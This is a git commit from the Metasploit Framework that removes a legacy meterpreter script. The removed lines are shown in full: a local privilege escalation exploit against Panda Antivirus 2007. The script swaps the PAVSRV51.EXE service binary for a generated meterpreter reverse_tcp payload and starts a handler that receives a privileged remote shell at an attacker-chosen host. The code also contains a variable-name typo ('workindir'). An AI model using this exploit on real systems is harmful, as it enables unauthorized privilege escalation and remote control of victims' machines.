Remove scripts/meterpreter/panda_2007_pavsrv51.rb

2024-07-18 18:31:41 +02:00 · 2022-08-14 14:30:41 +10:00 · 2022-08-14 14:30:41 +10:00 · 1734042e64
commit 1734042e64
parent c9fb0950d9
1 changed files with 0 additions and 115 deletions
--- a/scripts/meterpreter/panda_2007_pavsrv51.rb
+++ b/scripts/meterpreter/panda_2007_pavsrv51.rb
@ -1,115 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# https://metasploit.com/framework/
-##
-
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to improve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-##
-# Panda Antivirus 2007 Local Privilege Escalation
-# This module exploits a privilege escalation vulnerability in
-# Panda Antivirus 2007. Due to insecure permission issues, a
-# local attacker can gain elevated privileges.
-#
-# This script has only been tested against Panda Antivirus 2007.
-#
-# BID - 4257
-# mc[@]metasploit.com
-##
-
-#
-# Options
-#
-@exec_opts = Rex::Parser::Arguments.new(
-  "-h"  => [ false,  "This help menu"],
-  "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
-  "-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-rhost = nil
-rport = nil
-
-def usage
-  print_status("Panda Antivirus 2007 Privilege Escalation.")
-  print_line(@exec_opts.usage)
-  raise Rex::Script::Completed
-end
-
-#
-# Option parsing
-#
-@exec_opts.parse(args) do |opt, idx, val|
-  case opt
-    when "-r"
-      rhost = val
-    when "-p"
-      rport = val.to_i
-    else
-      usage
-    end
-end
-
-if rhost.nil? or rport.nil?
-  usage
-elsif client.platform == 'windows'
-  client.sys.process.get_processes().each do |m|
-
-    if ( m['name'] =~ /PAVSRV51\.EXE/ )
-      print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
-
-      # Build out the exe payload.
-      pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
-      pay.datastore['LHOST'] = rhost
-      pay.datastore['LPORT'] = rport
-      raw  = pay.generate
-
-      exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-
-      # Change to our working directory.
-      workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
-      client.fs.dir.chdir(workindir)
-
-      # Create a backup of the original exe.
-      print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
-      client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
-
-      # Place our newly created exe with the orginal binary name.
-      tempexe = workingdir + "PAVSRV51.EXE"
-
-      print_status("Sending EXE payload '#{tempexe}'.")
-      fd = client.fs.file.new(tempexe, "wb")
-      fd.write(exe)
-      fd.close
-
-      print_status("Done, now just wait for the callback...")
-
-      # Our handler to recieve the callback.
-      handler = client.framework.exploits.create("multi/handler")
-      handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
-      handler.datastore['LHOST']   = rhost
-      handler.datastore['LPORT']   = rport
-      # Keep our shell stable.
-      handler.datastore['InitialAutoRunScript'] = "migrate -f"
-      handler.datastore['ExitOnSession'] = false
-
-      handler.exploit_simple(
-        'Payload'        => handler.datastore['PAYLOAD'],
-        'RunAsJob'       => true
-      )
-    end
-  end
-else
-  print_error("This version of Meterpreter is not supported with this script!")
-  raise Rex::Script::Completed
-end